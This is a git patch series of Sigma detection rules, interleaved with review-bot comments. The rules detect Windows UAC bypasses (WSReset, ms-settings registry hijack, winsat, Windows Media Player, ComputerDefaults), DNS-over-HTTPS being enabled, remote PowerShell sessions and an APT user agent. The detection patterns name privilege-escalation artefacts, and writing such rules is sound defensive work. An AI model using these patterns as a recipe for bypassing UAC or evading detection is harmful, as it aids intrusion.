+id: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2
+description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection1:
+ Image: 'C:\Program Files\Windows Media Player\osk.exe'
+ IntegrityLevel: 'High'
+ selection2:
+ Image: 'C:\Windows\System32\cmd.exe'
+ ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s'
+ IntegrityLevel: 'High'
+ condition: 1 of selection*
diff --git a/rules/windows/process_creation/win_uac_bypass_wsreset.yml b/rules/windows/process_creation/win_uac_bypass_wsreset.yml
new file mode 100644
index 00000000..e45b8880
--- /dev/null
+++ b/rules/windows/process_creation/win_uac_bypass_wsreset.yml
@@ -0,0 +1,25 @@
+title: UAC Bypass WSReset
+id: 89a9a0e0-f61a-42e5-8957-b1479565a658
+description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/
+ - https://github.com/hfiref0x/UACME
+ - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\wsreset.exe'
+ IntegrityLevel: 'High'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
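Review bot: In the WSReset hunk, `Image|endswith: '\wsreset.exe'` with `IntegrityLevel: 'High'` also describes a member of Administrators resetting the Store cache, since wsreset.exe is an auto-elevating binary and will run at High integrity on its own; with `level: high` and `falsepositives: Unknown` that is likely to page someone for benign activity. The bypass the references describe is about what wsreset.exe launches, so `ParentImage|endswith: '\wsreset.exe'` with `IntegrityLevel: 'High'` would be the tighter shape, and "Legitimate Store reset by an administrator" belongs under `falsepositives` either way. In the Windows Media Player hunk, `selection2` (cmd.exe spawned by `mmc.exe eventvwr.msc` at High integrity) is not covered by the description, which only names the osksupport.dll method; either extend `description:` or move that selection to its own rule.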
diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml
new file mode 100644
index 00000000..7f73e937
--- /dev/null
+++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml
@@ -0,0 +1,24 @@
+title: UAC Bypass Using Registry Shell Open Keys
+id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7
+description: Detects the pattern of UAC Bypass using fodhelper.exe or computerdefaults.exe via registry keys (UACMe 33 or 62)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: registry_event
+ product: windows
+detection:
+ selection:
+ Image: C:\Windows\explorer.exe
+ TargetObject|endswith: '-1???_Classes\ms-settings\shell\open\command\SymbolicLinkValue'
+ Details|contains: '-1???\Software\Classes\{'
+ condition: selection
diff --git a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml
new file mode 100644
index 00000000..5d375369
--- /dev/null
+++ b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml
@@ -0,0 +1,25 @@
+title: UAC Bypass Abusing Winsat Path Parsing - Registry
+id: 6597be7b-ac61-4ac8-bef4-d3ec88174853
+description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+author: Christian Burkard
+date: 2021/08/30
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: registry_event
+ product: windows
+detection:
+ selection:
+ TargetObject|contains: '\Root\InventoryApplicationFile\winsat.exe|'
+ TargetObject|endswith: '\LowerCaseLongPath'
+ Details|startswith: 'c:\users\'
+ Details|endswith: '\appdata\local\temp\system32\winsat.exe'
+ condition: selection
diff --git a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml
new file mode 100644
index 00000000..ce2652e0
--- /dev/null
+++ b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml
@@ -0,0 +1,23 @@
+title: UAC Bypass Using Windows Media Player - Registry
+id: 5f9db380-ea57-4d1e-beab-8a2d33397e93
+description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+author: Christian Burkard
+date: 2021/08/23
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+falsepositives:
+ - Unknown
+level: high
+logsource:
+ category: registry_event
+ product: windows
+detection:
+ selection:
+ TargetObject|endswith: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe'
+ Details: 'Binary Data'
+ condition: selection
From 18cdc36d73be4314fefe8ef630802c18270eaa86 Mon Sep 17 00:00:00 2001
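Review bot: `Details|startswith: 'c:\users\'` hard-codes the system drive while the other modifiers in the same selection are drive-agnostic; `Details|contains: ':\users\'` together with the existing `Details|endswith` keeps the intent on hosts whose profiles live on another drive. If the `InventoryApplicationFile\...\LowerCaseLongPath` value is the application-inventory data written by the compatibility appraiser rather than by the process itself (presumably, given the key path), the registry event can land well after the actual execution; a sentence in the description about that latency would help analysts correlate it with the matching process-creation rule. The same rule-wide point applies to the wmp registry hunk below, whose `TargetObject|endswith` likewise pins `C:\Program Files`.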
From: frack113 Date: Tue, 31 Aug 2021 13:44:54 +0200 Subject: [PATCH 0644/1367] Fix EventID 4103 detection --- .../powershell/powershell_remote_powershell_session.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index e8e29b1a..652741eb 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -2,7 +2,7 @@ action: global title: Remote PowerShell Session id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions -status: experimental +status: test date: 2019/08/10 modified: 2020/08/24 author: Roberto Rodriguez @Cyb3rWard0g @@ -25,9 +25,10 @@ logsource: definition: Module Logging must be enable and fields have to be extract from event detection: selection: - EventID: 4103 - HostName: 'ServerRemoteHost' - HostApplication|contains: 'wsmprovhost.exe' + EventID: 4103 + ContextInfo|contains|all: + - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte = + - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = condition: selection --- logsource: From eb434732a74cd5db3da7b803e28a9561c58e943c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 31 Aug 2021 13:48:07 +0200 Subject: [PATCH 0645/1367] move rule not only powershell --- .../{powershell => builtin}/win_powershell_web_request.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/{powershell => builtin}/win_powershell_web_request.yml (96%) diff --git a/rules/windows/powershell/win_powershell_web_request.yml b/rules/windows/builtin/win_powershell_web_request.yml similarity index 96% rename from rules/windows/powershell/win_powershell_web_request.yml rename to rules/windows/builtin/win_powershell_web_request.yml index 37e172c9..54319f96 100644 
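Review bot: The trailing space in `' = ServerRemoteHost '` assumes the value is followed by a space inside `ContextInfo`; in the raw 4103 event each `Name = Value` pair ends with a line break, so unless the collector flattens the field into one line the `|contains|all` selection would never match — verify against a captured event, or drop the trailing space (`' = ServerRemoteHost'`). The leading space is worth keeping, as it stops a longer host name ending in the same token from matching. Separately, `modified: 2020/08/24` is left unchanged although the detection logic is rewritten here; the date should be bumped to this commit's date so consumers can see the rule semantics changed.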
--- a/rules/windows/powershell/win_powershell_web_request.yml +++ b/rules/windows/builtin/win_powershell_web_request.yml @@ -2,7 +2,7 @@ action: global title: Windows PowerShell Web Request id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d status: experimental -description: Detects the use of various web request methods (including aliases) via Windows PowerShell +description: Detects the use of various web request methods (including aliases) via Windows PowerShell command references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell From 6eb7245673a1288943b9f92f2d122840415e9622 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 15:58:57 +0200 Subject: [PATCH 0646/1367] fix: remove user sid, match any sid instead --- .../windows/registry_event/sysmon_uac_bypass_shell_open.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 7f73e937..38c9c889 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -18,7 +18,6 @@ logsource: product: windows detection: selection: - Image: C:\Windows\explorer.exe - TargetObject|endswith: '-1???_Classes\ms-settings\shell\open\command\SymbolicLinkValue' - Details|contains: '-1???\Software\Classes\{' + TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' + Details|contains: '\Software\Classes\{' condition: selection From 9dc8d3856561d6ee77c8354f9af540dbd8464fb8 Mon Sep 17 00:00:00 2001 
From: Austin Songer
Date: Tue, 31 Aug 2021 09:14:14 -0500
Subject: [PATCH 0647/1367] Create sysmon_dns_over_https_enabled.yml
---
.../sysmon_dns_over_https_enabled.yml | 34 +++++++++++++++++++
1 file changed, 34 insertions(+)
create mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml
diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml
new file mode 100644
index 00000000..e3ba5eb6
--- /dev/null
+++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml
@@ -0,0 +1,34 @@
+title: DNS-over-HTTPS Enabled by Registry
+id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5
+date: 2021/07/22
+description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
+author: Austin Songer
+status: experimental
+references:
+ - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html
+ - https://github.com/elastic/detection-rules/issues/1371
+ - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode
+tags:
+ - attack.defense_evasion
+ - attack.t1140
+ - attack.t1112
+logsource:
+ product: windows
+ category: registry_event
+detection:
+ selection1:
+ TargetObject:
+ - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled'
+ Details: 'DWORD (1)'
+ selection2:
+ TargetObject:
+ - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode'
+ Details: 'DWORD (secure)'
+ selection3:
+ TargetObject:
+ - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS'
+ Details: 'DWORD (1)'
+ condition: selection1 or selection2 or selection3
+falsepositives:
+- Unlikely
+level: medium
From 59d8e0b8668dd8762723e8bed3de11ad877bd7b5 Mon Sep 17 00:00:00 2001
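Review bot: The `TargetObject` and `Details` values do not match how Sysmon renders registry events, so on a Sysmon source none of the three selections can fire: Sysmon abbreviates the hive root (`HKLM\SOFTWARE\...`, not `HKEY_LOCAL_MACHINE\SOFTWARE\...`) and renders REG_DWORD data as `DWORD (0x00000001)`, not `DWORD (1)`. In selection2, Chrome's `DnsOverHttpsMode` policy is a string value, so `'DWORD (secure)'` cannot occur at all. A suffix match avoids the root-prefix problem, e.g. `TargetObject|endswith: '\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled'` with `Details: 'DWORD (0x00000001)'`; patch 0650 below only reshapes these lines from list to scalar and leaves the values as they are, so the point stands after it too. Organizations that roll out DoH by group policy write exactly these keys, so `falsepositives: Unlikely` understates the benign case and should mention policy deployment.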
From: phantinuss Date: Tue, 31 Aug 2021 16:18:05 +0200 Subject: [PATCH 0648/1367] add System IntegrityLevel to uac bypass rules, the level is not used most of the time, but might --- .../process_creation/win_cmstp_com_object_access.yml | 4 +++- .../process_creation/win_uac_bypass_changepk_slui.yml | 4 +++- .../windows/process_creation/win_uac_bypass_cleanmgr.yml | 4 +++- .../process_creation/win_uac_bypass_consent_comctl32.yml | 4 +++- .../windows/process_creation/win_uac_bypass_dismhost.yml | 8 ++++++-- .../windows/process_creation/win_uac_bypass_ieinstal.yml | 4 +++- .../process_creation/win_uac_bypass_msconfig_gui.yml | 4 +++- .../win_uac_bypass_ntfs_reparse_point.yml | 8 ++++++-- .../process_creation/win_uac_bypass_pkgmgr_dism.yml | 6 ++++-- rules/windows/process_creation/win_uac_bypass_winsat.yml | 4 +++- rules/windows/process_creation/win_uac_bypass_wmp.yml | 8 ++++++-- rules/windows/process_creation/win_uac_bypass_wsreset.yml | 4 +++- 12 files changed, 46 insertions(+), 16 deletions(-) diff --git a/rules/windows/process_creation/win_cmstp_com_object_access.yml b/rules/windows/process_creation/win_cmstp_com_object_access.yml index f0dc77b3..7a12cc4a 100644 --- a/rules/windows/process_creation/win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/win_cmstp_com_object_access.yml @@ -26,7 +26,9 @@ logsource: detection: selection: ParentImage|endswith: '\DllHost.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentCommandLine|contains: - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' diff --git a/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml index b7c37d4e..35c63c90 100644 --- a/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml +++ b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml 
@@ -19,7 +19,9 @@ detection: selection: Image|endswith: '\changepk.exe' ParentImage|endswith: '\slui.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection falsepositives: - Unknown diff --git a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml index 91546a9b..3ed387b3 100644 --- a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml +++ b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml @@ -20,5 +20,7 @@ detection: selection: CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:' ParentCommandLine: 'C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml index 61fb4b62..e690075d 100644 --- a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml +++ b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml @@ -20,5 +20,7 @@ detection: selection: ParentImage|endswith: '\consent.exe' Image|endswith: '\werfault.exe' - IntegrityLevel: 'System' + IntegrityLevel: + - 'High' + - 'System' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml index f0c206f6..6647013e 100644 --- a/rules/windows/process_creation/win_uac_bypass_dismhost.yml +++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml 
@@ -22,12 +22,16 @@ detection: - 'C:\Users\' - '\AppData\Local\Temp\' - '\DismHost.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' selection2: Image|contains|all: - 'C:\Users\' - '\AppData\Local\Temp\' - '\DismHost.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentCommandLine: 'C:\Windows\system32\cleanmgr.exe /autoclean /d C:' condition: 1 of selection* diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml index e45aa045..a6458810 100644 --- a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml +++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml @@ -18,7 +18,9 @@ logsource: product: windows detection: selection: - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentImage|endswith: '\ieinstal.exe' Image|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml index 7d2f6aae..a7d65fd2 100644 --- a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml +++ b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml @@ -18,7 +18,9 @@ logsource: product: windows detection: selection: - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentImage|endswith: '\AppData\Local\Temp\pkgmgr.exe' CommandLine: '"C:\Windows\system32\msconfig.exe" -5' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml index a0f828e8..4319cada 100644 --- a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml 
@@ -20,10 +20,14 @@ detection: selection1: CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' CommandLine|endswith: '\AppData\Local\Temp\update.msu' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' selection2: ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Temp\' diff --git a/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml index 570938ee..75d1a14d 100644 --- a/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml +++ b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml @@ -17,8 +17,10 @@ detection: selection: ParentImage|endswith: '\pkgmgr.exe' Image|endswith: '\dism.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_winsat.yml b/rules/windows/process_creation/win_uac_bypass_winsat.yml index 49773539..c9ec3b38 100644 --- a/rules/windows/process_creation/win_uac_bypass_winsat.yml +++ b/rules/windows/process_creation/win_uac_bypass_winsat.yml @@ -18,7 +18,9 @@ logsource: product: windows detection: selection: - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' ParentImage|endswith: '\AppData\Local\Temp\system32\winsat.exe' ParentCommandLine|contains: 'C:\Windows \system32\winsat.exe' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_wmp.yml b/rules/windows/process_creation/win_uac_bypass_wmp.yml index 6b1691be..25ab25c7 100644 --- a/rules/windows/process_creation/win_uac_bypass_wmp.yml +++ b/rules/windows/process_creation/win_uac_bypass_wmp.yml 
@@ -19,9 +19,13 @@ logsource: detection: selection1: Image: 'C:\Program Files\Windows Media Player\osk.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' selection2: Image: 'C:\Windows\System32\cmd.exe' ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: 1 of selection* diff --git a/rules/windows/process_creation/win_uac_bypass_wsreset.yml b/rules/windows/process_creation/win_uac_bypass_wsreset.yml index e45b8880..8e4707a9 100644 --- a/rules/windows/process_creation/win_uac_bypass_wsreset.yml +++ b/rules/windows/process_creation/win_uac_bypass_wsreset.yml @@ -18,7 +18,9 @@ logsource: detection: selection: Image|endswith: '\wsreset.exe' - IntegrityLevel: 'High' + IntegrityLevel: + - 'High' + - 'System' condition: selection falsepositives: - Unknown From add1ad40f86969cc0ca302b3d12d8b4590feed24 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 16:23:32 +0200 Subject: [PATCH 0649/1367] additional UAC bypass rule --- .../win_uac_bypass_computerdefaults.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation/win_uac_bypass_computerdefaults.yml diff --git a/rules/windows/process_creation/win_uac_bypass_computerdefaults.yml b/rules/windows/process_creation/win_uac_bypass_computerdefaults.yml new file mode 100644 index 00000000..6677408e --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_computerdefaults.yml 
@@ -0,0 +1,29 @@
+title: UAC Bypass Using ComputerDefaults
+id: 3c05e90d-7eba-4324-9972-5d7f711a60a8
+description: Detects the pattern of UAC Bypass using computerdefaults.exe (UACMe 59)
+author: Christian Burkard
+date: 2021/08/31
+status: experimental
+references:
+ - https://github.com/hfiref0x/UACME
+tags:
+ - attack.defense_evasion
+ - attack.privilege_escalation
+ - attack.t1548.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ IntegrityLevel:
+ - 'High'
+ - 'System'
+ Image: 'C:\Windows\System32\ComputerDefaults.exe'
+ filter:
+ ParentImage|contains:
+ - ':\Windows\System32'
+ - ':\Program Files'
+ condition: selection and not filter
+falsepositives:
+ - Unknown
+level: high
From cff572b7527e251f5024f8dfc1bef1a13f36785d Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Tue, 31 Aug 2021 17:11:04 +0200
Subject: [PATCH 0650/1367] Update sysmon_dns_over_https_enabled.yml
---
.../registry_event/sysmon_dns_over_https_enabled.yml | 9 +++------
1 file changed, 3 insertions(+), 6 deletions(-)
diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml
index e3ba5eb6..c7687eed 100644
--- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml
+++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml
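Review bot: The `filter` suppresses any parent whose path contains `:\Windows\System32`, which is also where the command and script interpreters are installed, while an ordinary interactive launch has `C:\Windows\explorer.exe` as its parent and matches neither filter string, so the benign case alerts and the System32-hosted parents are excluded; that looks inverted relative to the rule's intent and at least deserves a comment explaining which parents are considered trusted. A positive list of expected launchers (e.g. `ParentImage|endswith: '\explorer.exe'` plus whatever the Settings app uses on your baseline) states the assumption more precisely than a substring exclusion. `Image: 'C:\Windows\System32\ComputerDefaults.exe'` additionally pins the system drive; `Image|endswith: '\System32\ComputerDefaults.exe'` keeps the intent on other drive letters.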
@@ -17,16 +17,13 @@ logsource: category: registry_event detection: selection1: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' Details: 'DWORD (1)' selection2: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' selection3: - TargetObject: - - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' + TargetObject: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' Details: 'DWORD (1)' condition: selection1 or selection2 or selection3 falsepositives: From 9b2006027546b922d4a8ca34585ea55aca9a4a0b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 31 Aug 2021 17:14:19 +0200 Subject: [PATCH 0651/1367] SideWalk UA --- rules/proxy/proxy_ua_apt.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/proxy/proxy_ua_apt.yml b/rules/proxy/proxy_ua_apt.yml index 0c51fd03..d7298a8c 100644 --- a/rules/proxy/proxy_ua_apt.yml +++ b/rules/proxy/proxy_ua_apt.yml @@ -50,6 +50,7 @@ detection: - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657 - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/ - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/ + - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin condition: selection fields: - ClientIP From b0efaf5a510ebd358e6f2b548af09b6493e0d4d1 Mon Sep 17 00:00:00 2001 
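Review bot: The new user-agent entry carries only an actor/malware name in its trailing comment while every neighbouring entry cites the report it was taken from; add the source so the indicator can be re-validated later, e.g. `# SideWalk malware used by Sparkling Goblin <source URL placeholder>`. The string is also shorter than the others (no OS token between `Mozilla/5.0` and `Chrome/`), so a reference would help judge how likely an exact benign match is. The hunk is the last in this file section; the `selection` list it extends starts above the hunk.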
From: Young Date: Tue, 31 Aug 2021 18:15:46 -0700 Subject: [PATCH 0652/1367] changed adjustMatches function to combine aall atomic matches into a single bool statement --- .DS_Store | Bin 8196 -> 8196 bytes tools/sigma/backends/opensearch.py | 36 +++++++++++++++++++++-------- 2 files changed, 26 insertions(+), 10 deletions(-) diff --git a/.DS_Store b/.DS_Store index ec1c03f419ae50d6a9f11096836056b8ba0ed345..b4c524a393c6a725f38a82ba14af4978c2a95449 100644 GIT binary patch delta 57 rcmZp1XmQx!EXr?cVOp!BP;F^sprc@7Y&Lnjkoo3L(Ov8~B&wMJ-?9*i delta 57 rcmZp1XmQx!EXr?UZdR+KP;F^wtfOFRVmf)dkoo3L(Ov8~B&wMJ;06$l diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index b89c9130..a2b951cb 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py 
@@ -169,18 +169,34 @@ def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> Li return result ''' -Wraps match statements inside bool-must statement. +Group atomic match statements together into parent clause and wrap inside bool statement. +Maintain group match statements, which are already wrapped in bool statement. ''' -def adjust_matches(matches: List[dict]) -> List[dict]: +def adjust_matches(matches: List[dict], clause) -> List[dict]: + atomicMatches = [] + combinedAtomicMatches = [] + groupMatches = [] + + # Determine if current statement is an atomic match or bool group statement for index in range(len(matches)): match = matches[index] if "match" in match.keys(): - matches[index] = { + atomicMatches.append(match) + else: + groupMatches.append(match) + + # If any atomic matches, combine under parent clause wrapped in a single bool statement + if atomicMatches: + # If there's only one atomic match, it should be wrapped in a bool-must regardless of the parent clause + clause = "must" if len(atomicMatches) == 1 else clause + + combinedAtomicMatches = [{ "bool": { - "must": [match] + clause: atomicMatches } - } - return matches + }] + + return combinedAtomicMatches + groupMatches def contains_group(booleanArr: List[Boolean]) -> bool: for boolean in booleanArr: @@ -198,7 +214,7 @@ def translate_ary(ary: Ary) -> dict: while translateIndex < len(parsedTranslation): parsedExpression = parsedTranslation[translateIndex] currMatches = [] - clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements + clause = "must" # default clause is "must"; clause is "should" if multiple consecutive "or" statements # Statement was joined by "or" if len(parsedExpression) == 1: 
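Review bot: `clause` is added as a required positional parameter, so any caller other than the one updated in `translate_ary` (the only one visible here) now fails with a TypeError; a default keeps the old contract: `def adjust_matches(matches: List[dict], clause: str = "must") -> List[dict]:`. The index loop `for index in range(len(matches)): match = matches[index]` no longer writes back by index and can simply be `for match in matches:`, and the `combinedAtomicMatches = []` pre-assignment is dead because the name is always rebound before use. The return value also places the combined atomic clause ahead of the group matches regardless of their original position; that is presumably harmless inside a bool query, but it is a behavioural change worth one sentence in the header comment.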
